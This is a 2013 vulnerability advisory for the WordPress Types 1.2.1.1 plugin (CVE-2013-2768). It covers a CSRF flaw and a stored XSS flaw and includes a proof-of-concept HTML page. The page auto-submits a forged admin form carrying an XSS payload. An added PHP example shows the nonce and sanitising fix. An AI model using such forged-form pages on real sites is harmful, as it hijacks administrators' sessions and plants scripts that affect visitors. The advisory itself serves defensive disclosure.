SSCHADV2013-005 - WordPress Plugin 'Types 1.2.1.1' Cross-Site Request Forgery & Stored Cross-site scripting vulnerability
Advisory: WordPress Plugin 'Types 1.2.1.1' Cross-Site Request Forgery & Stored Cross-site scripting vulnerability
Advisory ID: SSCHADV2013-005
Author: Stefan Schurtz
Affected Software: Successfully tested on Types 1.2.1.1
Vendor URL:
Vendor Status: fixed
CVE-ID: CVE-2013-2768
======================
Vulnerability Description
======================
The parameter 'skypename' of the WordPress plugin Types 1.2.1.1 is prone to a Cross-Site Request Forgery (CSRF) and a stored Cross-Site Scripting (XSS) vulnerability.
==============
PoC-Exploit
==============
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OWASP CRSFTester Demonstration</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "180" );
function pausecomp(millis)
{
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < millis);
}
function fireForms()
{
var count = 1;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
pausecomp(pauses[i]);
}
}
</script>
<H2>OWASP CRSFTester Demonstration</H2>
<form method="POST" name="form0" action="http://[target]:80/wordpress/wp-admin/admin.php?page=wpcf-edit">
<input type="hidden" name="wpcf[group][name]" value="custom-field-xss"/>
<input type="hidden" name="wpcf[group][description]" value="custom-field-xss"/>
<input type="hidden" name="wpcf[group][supports][page]" value="page"/>
<input type="hidden" name="wpcf[group][taxonomies][category]1" value="1"/>
<input type="hidden" name="wpcf[group][filters_association]" value="any"/>
<input type="hidden" name="wpcf[group][conditional_display][relation]" value="AND"/>
<input type="hidden" name="wpcf[group][conditional_display][custom]" value=""/>
<input type="hidden" name="_wpcf_cd_count_8f4483265b96384425c4987b109ac977-1" value="0"/>
<input type="hidden" name="wpcf[fields][skype-286667805][name]" value="<body onload=alert(/xss/) />"/>
<input type="hidden" name="wpcf[fields][skype-286667805][slug]" value="custom-field-xss"/>
<input type="hidden" name="wpcf[fields][skype-286667805][description]" value="custom-field-xss"/>
<input type="hidden" name="wpcf[fields][skype-286667805][repetitive]" value="0"/>
<input type="hidden" name="wpcf[fields][skype-286667805][type]" value="skype"/>
<input type="hidden" name="wpcf[fields][skype-286667805][validate][required][value]" value="true"/>
<input type="hidden" name="wpcf[fields][skype-286667805][validate][required][message]" value="This Field is required"/>
<input type="hidden" name="wpcf[fields][skype-286667805][is_new]" value="1"/>
<input type="hidden" name="_wpnonce_wpcf" value="1da0e73f7d"/>
<input type="hidden" name="_wp_http_referer" value="/wordpress/wp-admin/admin.php?page"/>
</form>
</body>
</html>
=====
Solution
=====
Upgrade to the latest version
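The PoC above works because a forged cross-origin form is accepted by the field-group editor and the submitted field name is later rendered as markup. The following handler is an added illustration of how such an admin form is normally hardened in WordPress; it is not the Types plugin's own code, and the nonce action name, capability, option name and allowed field types are assumed.

```php
<?php
// Added example, not the Types plugin's code. Shows the two controls that
// address the advisory's findings: server-side nonce verification (CSRF)
// and sanitising on input plus escaping on output (stored XSS).

function wpcf_example_save_field_group() {
    // 1. Capability check: only users allowed to manage settings get here.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.', '', array( 'response' => 403 ) );
    }

    // 2. CSRF protection: the nonce field '_wpnonce_wpcf' (name taken from the
    //    PoC) must match the assumed action 'wpcf_save_field_group' for the
    //    current user and session. A cross-origin page cannot read a fresh
    //    nonce, so a forged request dies here instead of being processed.
    check_admin_referer( 'wpcf_save_field_group', '_wpnonce_wpcf' );

    // 3. Whitelist and sanitise every submitted field definition.
    $allowed_types = array( 'skype', 'textfield', 'textarea', 'date' ); // assumed list
    $fields = isset( $_POST['wpcf']['fields'] ) ? (array) $_POST['wpcf']['fields'] : array();
    $clean  = array();
    foreach ( $fields as $id => $field ) {
        $type = $field['type'] ?? '';
        $clean[ sanitize_key( $id ) ] = array(
            // strips tags such as the "<body onload=...>" payload in the PoC
            'name'        => sanitize_text_field( wp_unslash( $field['name'] ?? '' ) ),
            'slug'        => sanitize_title( $field['slug'] ?? '' ),
            'description' => sanitize_text_field( wp_unslash( $field['description'] ?? '' ) ),
            'type'        => in_array( $type, $allowed_types, true ) ? $type : 'textfield',
        );
    }
    update_option( 'wpcf_example_fields', $clean ); // assumed option name
}

// Rendering the stored value: escape on output as well, so a value that
// slipped past input sanitising still cannot become active markup.
function wpcf_example_render_field_name( $name ) {
    return '<label>' . esc_html( $name ) . '</label>';
}

// The legitimate admin form carries a nonce bound to the logged-in user;
// this is the token the handler above checks.
function wpcf_example_render_form() {
    echo '<form method="post">';
    wp_nonce_field( 'wpcf_save_field_group', '_wpnonce_wpcf' );
    echo '<input type="text" name="wpcf[fields][f1][name]" />';
    echo '<input type="submit" value="Save" />';
    echo '</form>';
}
```

Note that the PoC hardcodes a nonce value; a nonce is only a CSRF defence when the server actually verifies it against the victim's session and the value is not predictable or reusable across users.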
================
Disclosure Timeline
================
30-Mar-2013 – informed plugins@wordpress.org
04-Apr-2013 – fixed by developer
====
Credits
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References
=======